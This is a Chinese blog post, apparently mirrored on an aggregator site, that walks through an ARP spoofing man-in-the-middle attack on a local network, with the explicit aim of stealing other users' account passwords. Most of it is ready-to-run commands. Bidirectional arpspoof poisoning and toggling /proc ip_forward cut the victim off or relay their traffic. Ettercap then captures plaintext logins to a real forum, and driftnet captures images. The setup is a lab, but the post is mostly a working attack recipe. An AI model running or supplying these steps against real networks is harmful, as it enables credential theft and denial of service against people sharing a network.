zoukankan      html  css  js  c++  java
  • 【漏洞复现】局域网 ARP 中间人攻击 获取他人账号密码


    日期:2019-07-18 14:24:42
    更新:
    作者:Bay0net
    介绍:如何在局域网内,窃取其他用户的账号密码?


    0x01、 漏洞环境

    攻击工具 arpspoof 基本用法:

    arpspoof -i eth0 -t 【目标 IP】 【网关】
    arpspoof -i eth0 -t  【网关】【目标 IP】
    

    攻击机

    IP:192.168.43.67
    操作系统:Kali 2019
    

    靶机

    IP:192.168.43.135
    操作系统:Win7 旗舰版 SP1
    

    攻击机和靶机,在同一个局域网内,局域网的网关是 192.168.43.1

    0x02、攻击过程

    使靶机断网

    在 kali 上,需要开启转发 IP 的功能,否则靶机会断网,所以可以使用该方法让靶机断网。

    先欺骗靶机,开启两个命令行界面,分别输入下面两条命令

    # 欺骗靶机
    arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
    arpspoof -i eth0 -t 192.168.43.1 192.168.43.135
    

    然后再开一个命令行,输入以下命令,关闭 ip_forward 功能。

    # 0 代表关闭 ip_forward 功能
    echo '0' > /proc/sys/net/ipv4/ip_forward
    

    靶机已经无法连接互联网,一直在转圈。

    如果想恢复主机的网络,再使用下面的语句即可。

    echo '1' > /proc/sys/net/ipv4/ip_forward
    

    窃取密码

    演示的网站:http://www.discuz.net/forum.php

    第一步,还是欺骗靶机,开启两个命令行界面,分别输入下面两条命令

    # 欺骗靶机
    arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
    arpspoof -i eth0 -t 192.168.43.1 192.168.43.135
    

    第二步,开启转发

    echo '1' > /proc/sys/net/ipv4/ip_forward
    

    第三步,使用工具进行嗅探

    ettercap -Tq -i eth0
    

    此时在靶机输入账号密码进行登录,kali 会自动分析并且把密码显示出来。

    点击登录,查看一下 kali,已经抓到了账号密码。

    嗅探图片

    driftnet -i eth0
    

  • 相关阅读:
    完全卸载SQL Server 2008r2
    win7:你需要来自Administrators的权限才能对此文件进行修改的一个文件
    web.config文件中配置数据库连接的两种方式
    IIS6/7 配置操作
    IIS6/7 配置问题
    svn一整套使用,从下载到整个服务器搭建完成的详细说明
    HTTP协议详解
    深入理解String的关键点和方法
    将博客搬至CSDN
    对Java Web项目中路径的理解
  • 原文地址:https://www.cnblogs.com/v1vvwv/p/local-area-network-arp-attack.html
Copyright © 2011-2022 走看看